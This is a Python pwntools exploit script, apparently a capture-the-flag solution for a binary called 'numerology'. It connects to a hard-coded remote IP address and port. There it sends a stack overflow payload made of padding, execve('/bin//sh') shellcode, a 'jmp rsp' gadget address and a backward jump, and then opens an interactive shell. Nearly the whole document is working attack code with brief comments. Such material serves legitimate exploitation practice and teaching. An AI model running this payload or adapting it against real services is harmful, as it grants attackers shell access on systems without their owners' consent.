Numerology
#!/usr/bin/env python3
from pwn import *
# Run mode is forced here instead of being read from the command line:
# the remote endpoint is used by default, and gdb is attached whenever a
# local process is started instead (see conn()).
args.LOCAL = False
args.DEBUG = True

# Target binary; assigning it to context.binary also fixes arch/bits for asm().
exe = ELF("./numerology")
context.binary = exe
context.log_level = 'info'
def conn():
    """Return the tube selected by the pwntools ``args`` flags.

    When ``args.LOCAL`` is set the binary at ``exe.path`` is started as a
    local process and, if ``args.DEBUG`` is also set, gdb is attached to it
    with an empty gdbscript.  Otherwise a socket to the hard-coded challenge
    endpoint (host and port as written in this script) is returned.
    """
    if not args.LOCAL:
        # Remote host/port are fixed in the source; change them here if the
        # endpoint moves.
        return remote("143.255.251.233", 13373)

    target = process([exe.path])
    if args.DEBUG:
        # The gdbscript is intentionally empty: attach only, no breakpoints.
        gdb.attach(target, gdbscript="""
""")
    return target
def main():
    """Build the single payload described in the comments below, send it
    on the connection returned by conn(), then drop to an interactive session.

    All addresses and offsets are fixed values recorded by the author for
    this particular binary; presumably they rely on the binary not being
    position-independent and on an executable stack, so they will not carry
    over to a rebuilt or hardened target -- TODO confirm against the binary.
    """
    #0x000000000040119e : jmp rsp # ROP to JMP RSP for Execute our Shellcode
    # Distance (in bytes) of the backward jump assembled below, from the
    # trailing jmp back to where the shellcode sits on the stack.
    offjmp4 = 0x72 # Offset JMP to JMP from our Stack pos to the position of the Shellcode
    # Raw machine code exactly as given on the page; its contents are not
    # documented here.
    shell=b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05' #Shellcode
    # Per the author's note, 36 bytes reach the saved return address, so the
    # shellcode is front-padded with 'A's to make the pad + shellcode 36 bytes.
    offset=36-len(shell) # 36 is our Overflow, So this takes Shell - 36 to add PAD
    r = conn()
    # Payload layout: pad | shellcode | gadget address | short backward jmp
    # (assembled by pwntools using the arch taken from context.binary).
    r.sendline(b'A'*offset + shell + p64(0x000000000040119e) +asm('jmp $-'+hex(offjmp4)))
    r.interactive()
if __name__ == '__main__':
    # Script entry point: only run when executed directly, not when imported.
    main()